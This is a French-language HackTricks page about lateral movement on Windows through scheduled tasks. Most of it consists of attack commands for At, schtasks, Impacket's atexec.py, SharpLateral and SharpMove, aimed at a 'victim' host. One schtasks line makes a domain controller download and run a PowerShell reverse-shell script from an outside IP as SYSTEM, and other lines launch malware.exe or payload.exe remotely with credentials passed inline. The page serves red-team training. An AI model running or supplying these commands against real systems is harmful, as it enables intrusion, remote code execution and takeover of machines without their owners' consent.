AtExec / SchtasksExec

Tip

Apprenez et pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Parcourez le catalogue complet de HackTricks Training pour les parcours d’évaluation (ARTA/GRTA/AzRTA) et Linux Hacking Expert (LHE).

Support HackTricks

Comment ça fonctionne

At permet de planifier des tâches sur des hôtes où vous connaissez le nom d’utilisateur/(mot de passe/Hash). Ainsi, vous pouvez l’utiliser pour exécuter des commandes sur d’autres hôtes et obtenir la sortie.

At \\victim 11:00:00PM shutdown -r

En utilisant schtasks, vous devez d’abord créer la tâche puis l’appeler :

schtasks /create /n <TASK_NAME> /tr C:\path\executable.exe /sc once /st 00:00 /S <VICTIM> /RU System
schtasks /run /tn <TASK_NAME> /S <VICTIM>

schtasks /create /S dcorp-dc.domain.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "MyNewtask" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.X/InvokePowerShellTcp.ps1''')'"
schtasks /run /tn "MyNewtask" /S dcorp-dc.domain.local

Vous pouvez utiliser Impacket’s atexec.py pour exécuter des commandes sur des systèmes distants en utilisant la commande AT. Cela nécessite des identifiants valides (nom d’utilisateur et mot de passe ou hash) pour le système cible.

atexec.py 'DOMAIN'/'USER':'PASSWORD'@'target_ip' whoami

Vous pouvez également utiliser SharpLateral :

SharpLateral schedule HOSTNAME C:\Users\Administrator\Desktop\malware.exe TaskName

Vous pouvez utiliser SharpMove :

SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password

Plus d’informations sur l’utilisation de schtasks avec des silver tickets ici.

Tip

Apprenez et pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez et pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Parcourez le catalogue complet de HackTricks Training pour les parcours d’évaluation (ARTA/GRTA/AzRTA) et Linux Hacking Expert (LHE).

Support HackTricks